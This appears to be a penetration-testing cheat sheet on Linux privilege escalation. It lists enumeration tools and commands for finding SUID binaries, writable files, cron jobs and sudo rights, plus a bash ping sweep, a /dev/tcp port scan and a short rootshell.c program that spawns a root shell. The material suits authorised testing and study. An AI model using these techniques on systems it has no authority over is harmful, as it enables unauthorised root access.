Linux Snippets


Small collection of Linux privilege escalation scripts, references and commands.

Scripts

LinEnum.sh
Private-i.sh
LinPeas.sh
pspy
LinuxPrivChecker.py
Linux-Exploit-Suggester.sh

References

GTFOBins
Linux - Privilege Escalation
Basic Linux Privilege Escalation

General

OS


cat /etc/issue
cat /etc/*-release

cat /proc/version
uname -a


Files


find / -readable 2>/dev/null           # find all readable files
find / -user <username> 2>/dev/null    # find all files owned by <username>
find / -group <groupname> 2>/dev/null  # find all files owned by <groupname>
find / -name <filename> 2>/dev/null    # find <filename>

find / -type f -name "*.conf" 2>/dev/null   # find all .conf files
find /etc -type f -name "*.conf"            # find all .conf files in /etc

find / -newermt <start-date> ! -newermt <end-date> 2>/dev/null   # find all files modified between the two dates

find targetdir/ -name '*.<extension>' -exec cat {} \; > out.txt   # concatenate all files with <extension> into out.txt
grep <keyword> out.txt

find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev'    # world-writable files (check startup scripts among them)

find / -writable -type d 2>/dev/null   # writable dirs


Cronjobs


crontab -l        # list the current user's crontab
cat /etc/crontab  # check the system-wide crontab

ls -la /etc/cron*

crontab -e        # edit the current user's crontab


Check capabilities


getcap -r / 2>/dev/null

+ep - adding a capability
-ep - removing a capability

There are three flags:
• e: Effective. The capability is "activated".
• p: Permitted. The capability can be used / is allowed.
• i: Inheritable. The capability is kept by child processes, for example across execve().


Running processes/services


ps aux 
ps -ef
ps aux | grep root
ps -ef | grep root

top
cat /etc/services


Running daemons


ps -eo 'tty,pid,comm' | grep '^?'   # all processes without a controlling tty (daemons)


Listening ports


netstat -an | grep 'LISTEN'
lsof -i -P -n | grep LISTEN
ss -tulw
grep -v "rem_address" /proc/net/tcp | awk '$4=="0A" {x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2)); print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'   # decode local_address of sockets in LISTEN state (0A); needs gawk for strtonum
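The /proc/net/tcp one-liner depends on gawk's strtonum; the portable POSIX sh version below does the same decoding (little-endian hex IPv4 and hex port, LISTEN state 0A) and runs here against a constructed sample of /proc/net/tcp. This is an added example, not part of the original cheat sheet; the function and variable names are mine, and on a real host you would feed it `< /proc/net/tcp` instead of the sample.

```shell
#!/bin/sh
# Constructed sample in /proc/net/tcp format (assumed values, not captured from a real host):
# line 0 = 127.0.0.1:22 LISTEN, line 1 = 0.0.0.0:443 LISTEN, line 2 = an ESTABLISHED (01) client socket
SAMPLE_TCP='  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 0100007F:8A3C 0100007F:0016 01 00000000:00000000 00:00000000 00000000  1000        0 12347 1 0000000000000000 20 4 30 10 -1'

# hex2ip: 8 hex digits in host (little-endian) byte order -> dotted quad.
# "0100007F" is 7F.00.00.01 read from the right, i.e. 127.0.0.1.
hex2ip() {
  h=$1
  printf '%d.%d.%d.%d' \
    "0x$(echo "$h" | cut -c7-8)" \
    "0x$(echo "$h" | cut -c5-6)" \
    "0x$(echo "$h" | cut -c3-4)" \
    "0x$(echo "$h" | cut -c1-2)"
}

# hex2port: 4 hex digits (network order, as printed by the kernel) -> decimal port.
hex2port() {
  printf '%d' "0x$1"
}

# list_listeners: read /proc/net/tcp-formatted text on stdin and print ip:port
# for every socket whose state column is 0A (TCP_LISTEN). The header line
# starts with "sl" and is skipped; non-listening sockets are ignored.
list_listeners() {
  while read -r sl laddr raddr st rest; do
    [ "$sl" = "sl" ] && continue
    [ "$st" = "0A" ] || continue
    ip=$(hex2ip "${laddr%%:*}")
    port=$(hex2port "${laddr##*:}")
    printf '%s:%s\n' "$ip" "$port"
  done
}

# Run against the constructed sample; replace with "list_listeners < /proc/net/tcp" on a live system.
printf '%s\n' "$SAMPLE_TCP" | list_listeners
```

Comparing this output with what `ss -tul` or `netstat` reports is a quick way to spot a service that is hidden from userland tools but still visible through procfs.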


Firewall rules


cat /etc/iptables/rules.v4
cat /etc/iptables/rules.v6


Sudo configuration


sudo -l
cat /etc/sudoers


Vulnerable binaries


find / -perm -u=s -type f 2>/dev/null   # SUID
find / -perm -g=s -type f 2>/dev/null   # SGID


Ping sweep


for i in {1..254}; do (ping -c 1 x.x.x.$i | grep "bytes from" &); done


Port scan


for p in {1..1024}; do (echo >/dev/tcp/<ip>/$p) >/dev/null 2>&1 && echo "$p open"; done


rootshell.c


#include <stdio.h>
#include <unistd.h>   /* setuid/setgid/seteuid/setegid/execvp */

int main(void) {
    /* Only takes effect when the binary already runs with root privileges (e.g. SUID root). */
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    char *argv[] = { "/bin/sh", NULL };
    execvp(argv[0], argv);   /* execvp(file, argv) takes two arguments, not three */
    perror("execvp");        /* only reached if the exec fails */
    return 1;
}